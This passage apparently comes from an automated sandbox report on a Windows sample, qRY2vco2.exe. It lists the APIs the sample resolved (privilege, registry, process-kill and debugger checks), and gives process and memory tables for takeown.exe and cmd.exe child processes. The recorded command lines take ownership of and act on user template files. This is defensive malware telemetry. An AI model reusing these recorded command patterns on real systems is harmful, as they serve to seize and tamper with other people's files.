| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:26 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #236: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #236 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:52, Reason: Child Process |
| Unmonitor | End Time: 00:03:55, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xae0 |
| Parent PID | 0x8e0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FE8
0x
A24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000b90000 | 0x00b90000 | 0x00baffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x00b9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00ba3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bb0000 | 0x00bb0000 | 0x00bb1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00bb0000 | 0x00bb4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000bc0000 | 0x00bc0000 | 0x00bd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00c5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c60000 | 0x00c60000 | 0x00c63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c70000 | 0x00c70000 | 0x00c70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c80000 | 0x00c80000 | 0x00c81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00c90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00d9ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00da0000 | 0x00e5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e60fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e70000 | 0x00e70000 | 0x00e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ec0000 | 0x00ec0000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00f00000 | 0x00f29fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f50000 | 0x00f50000 | 0x010d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000053c0000 | 0x053c0000 | 0x067bffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x067c0000 | 0x06af6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f620000 | 0x7f620000 | 0x7f71ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f720000 | 0x7f720000 | 0x7f742fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f747000 | 0x7f747000 | 0x7f749fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f74a000 | 0x7f74a000 | 0x7f74cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f74d000 | 0x7f74d000 | 0x7f74dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f74f000 | 0x7f74f000 | 0x7f74ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #237: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #237 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "Music.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:52, Reason: Child Process |
| Unmonitor | End Time: 00:03:59, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x854 |
| Parent PID | 0xde0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A1C
0x
4F4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x04baffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bb0000 | 0x04bb0000 | 0x04bbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04bd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04bd3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004be0000 | 0x04be0000 | 0x04bf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04d3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d40000 | 0x04d40000 | 0x04d43fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004d50000 | 0x04d50000 | 0x04d50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d60000 | 0x04d60000 | 0x04d61fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e20000 | 0x04e20000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04f70000 | 0x0502dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005030000 | 0x05030000 | 0x0512ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005130000 | 0x05130000 | 0x0526ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05270000 | 0x055a6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f670000 | 0x7f670000 | 0x7f76ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f770000 | 0x7f770000 | 0x7f792fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f796000 | 0x7f796000 | 0x7f796fff | Private Memory | rw |
|
|
|
- |
